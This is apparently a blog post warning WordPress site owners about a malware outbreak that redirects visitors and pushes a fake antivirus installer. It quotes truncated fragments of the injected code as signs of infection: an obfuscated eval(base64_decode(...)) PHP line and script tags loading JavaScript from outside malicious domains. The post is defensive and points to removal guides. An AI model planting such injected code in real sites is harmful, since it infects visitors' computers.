wordpress securityAccording to various reports on various security sites, a number of websites running on WordPress CMS platform have been infected with a malicious code. This code is really dangerous and tries to install a virus on the compute of the visitors.

Initially it appeared that the attack is limited to the websites hosted on a popular webhost Dreamhost, but later on other webhosts also reported the attack. Although it is not yet confirmed, but most of the sites affected were not running the updated and latest version of WordPress.

If you are not running the latest WordPress, do yourself a favor and upgrade to the latest release of WordPress, before reading it further.

How This WordPress Security Attack Operate

While the exact manner in which the latest WordPress attack operate, a few common behavior noticed are as follows.

  • Your website is redirected to:http://www1.firesavez5.com/?p=p52dcWpkbmmHjsbIo216h3de0KCf…….. or
  • This redirect page is a blank page. The source code contains the following:
    <h1>404 Not Found</h1>The page that you have requested could not be found.
  • All of your .php files on your WordPress contain the following malicious code…<?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9z…..
  • Located in the source code near the bottom of all .php files is the following script:<script src=”http://zettapetta.com/js.php”></script> and <script src=”http://www.indesignstudioinfo.com/ls.php”> .
  • Your antivirus program blocks the installation of the threat: www.firesavez5.com or a www.firesaver6.com installer.

WordPressSecurityLock and Sucuri Security have published detailed steps for removing this malware from your wordpress installation files.